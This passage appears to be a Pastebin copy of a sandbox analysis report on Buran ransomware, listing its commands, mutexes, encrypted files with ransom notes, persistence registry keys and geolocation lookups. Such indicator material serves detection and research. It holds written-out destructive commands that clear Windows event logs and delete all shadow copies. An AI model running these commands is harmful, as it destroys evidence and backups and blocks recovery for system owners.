  604. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
  605.  
  606.  
  607. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
  608.  
  609.  
  610. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
  611.  
  612.  
  613. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
  614.  
  615.  
  616. "command": "vssadmin delete shadows /all /quiet"
  617.  
  618.  
  619. "command": "wevtutil.exe clear-log Application"
  620.  
  621.  
  622. "command": "wevtutil.exe clear-log Security"
  623.  
  624.  
  625. "command": "wevtutil.exe clear-log System"
  626.  
  627.  
  628.  
  629.  
  630.  
  631. * Started Service:
  632.  
  633. * Mutexes:
  634. "Global\\ADAP_WMI_ENTRY",
  635. "Global\\RefreshRA_Mutex",
  636. "Global\\RefreshRA_Mutex_Lib",
  637. "Global\\RefreshRA_Mutex_Flag"
  638.  
  639.  
  640. * Modified Files:
  641. "C:\\Users\\user\\AppData\\Local\\Temp\\3C20D05E.buran",
  642. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe",
  643. "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran",
  644. "\\??\\PIPE\\wkssvc",
  645. "\\Device\\LanmanDatagramReceiver",
  646. "\\??\\PIPE\\DAV RPC SERVICE",
  647. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  648. "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
  649. "\\??\\PIPE\\samr",
  650. "C:\\.doc",
  651. "C:\\.doc.3217EE46-3DA6-888C-CFD6-E175EC571166",
  652. "C:\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  653. "C:\\.htm",
  654. "C:\\.htm.3217EE46-3DA6-888C-CFD6-E175EC571166",
  655. "C:\\.jpeg",
  656. "C:\\.jpeg.3217EE46-3DA6-888C-CFD6-E175EC571166",
  657. "C:\\.jpg",
  658. "C:\\.jpg.3217EE46-3DA6-888C-CFD6-E175EC571166",
  659. "C:\\.pptx",
  660. "C:\\.pptx.3217EE46-3DA6-888C-CFD6-E175EC571166",
  661. "C:\\.txt",
  662. "C:\\.txt.3217EE46-3DA6-888C-CFD6-E175EC571166",
  663. "C:\\.xls",
  664. "C:\\.xls.3217EE46-3DA6-888C-CFD6-E175EC571166",
  665. "C:\\.zip",
  666. "C:\\2960.ini",
  667. "C:\\Host.bmp",
  668. "C:\\Host.bmp.3217EE46-3DA6-888C-CFD6-E175EC571166",
  669. "C:\\Host.docx",
  670. "C:\\Host.docx.3217EE46-3DA6-888C-CFD6-E175EC571166",
  671. "C:\\Host.html",
  672. "C:\\Host.html.3217EE46-3DA6-888C-CFD6-E175EC571166",
  673. "C:\\Host.jpeg",
  674. "C:\\Host.jpeg.3217EE46-3DA6-888C-CFD6-E175EC571166",
  675. "C:\\Host.jpg",
  676. "C:\\Host.jpg.3217EE46-3DA6-888C-CFD6-E175EC571166",
  677. "C:\\Host.pdf",
  678. "C:\\Host.pdf.3217EE46-3DA6-888C-CFD6-E175EC571166",
  679. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico",
  680. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico.3217EE46-3DA6-888C-CFD6-E175EC571166",
  681. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  682. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url",
  683. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url.3217EE46-3DA6-888C-CFD6-E175EC571166",
  684. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat",
  685. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat.3217EE46-3DA6-888C-CFD6-E175EC571166",
  686. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf",
  687. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf.3217EE46-3DA6-888C-CFD6-E175EC571166",
  688. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat",
  689. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat.3217EE46-3DA6-888C-CFD6-E175EC571166",
  690. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf",
  691. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf.3217EE46-3DA6-888C-CFD6-E175EC571166",
  692. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat",
  693. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat.3217EE46-3DA6-888C-CFD6-E175EC571166",
  694. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf",
  695. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf.3217EE46-3DA6-888C-CFD6-E175EC571166",
  696. "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT",
  697. "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT.3217EE46-3DA6-888C-CFD6-E175EC571166",
  698. "C:\\Program Files\\Java\\jre1.8.0_201\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  699. "C:\\Program Files\\Java\\jre1.8.0_201\\LICENSE"
  700.  
  701.  
  702. * Deleted Files:
  703. "C:\\Users\\user\\AppData\\Local\\Temp\\3C20D05E.buran",
  704. "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran",
  705. "C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe",
  706. "C:\\.doc",
  707. "C:\\.htm",
  708. "C:\\.jpeg",
  709. "C:\\.jpg",
  710. "C:\\.pptx",
  711. "C:\\.txt",
  712. "C:\\.xls",
  713. "C:\\Host.bmp",
  714. "C:\\Host.docx",
  715. "C:\\Host.html",
  716. "C:\\Host.jpeg",
  717. "C:\\Host.jpg",
  718. "C:\\Host.pdf",
  719. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico",
  720. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url",
  721. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat",
  722. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf",
  723. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat",
  724. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf",
  725. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat",
  726. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf",
  727. "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT"
  728.  
  729.  
  730. * Modified Registry Keys:
  731. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Local Security Authority Subsystem Service",
  732. "HKEY_CURRENT_USER\\Software\\Buran V\\Service",
  733. "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Public Key",
  734. "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Machine ID",
  735. "HKEY_CURRENT_USER\\Software\\Buran V\\Knock",
  736. "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Paths",
  737. "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Paths\\0",
  738. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\Registry Writer",
  739. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\COM+ REGDB Writer",
  740. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\ASR Writer",
  741. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\Shadow Copy Optimization Writer",
  742. "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers",
  743. "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\\(Default)"
  744.  
  745.  
  746. * Deleted Registry Keys:
  747.  
  748. * DNS Communications:
  749.  
  750. "type": "A",
  751. "request": "geoiptool.com",
  752. "answers":
  753.  
  754.  
  755. "type": "A",
  756. "request": "iplogger.ru",
  757. "answers":
  758.  
  759.  
  760.  
  761. * Domains:
  762.  
  763. "ip": "158.69.67.193",
  764. "domain": "geoiptool.com"
  765.  
  766.  
  767. "ip": "88.99.66.31",
  768. "domain": "iplogger.ru"
  769.  
  770.  
  771.  
  772. * Network Communication - ICMP:
  773.  
  774. * Network Communication - HTTP:
  775.  
  776. * Network Communication - SMTP:
  777.  
  778. * Network Communication - Hosts:
  779.  
  780. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!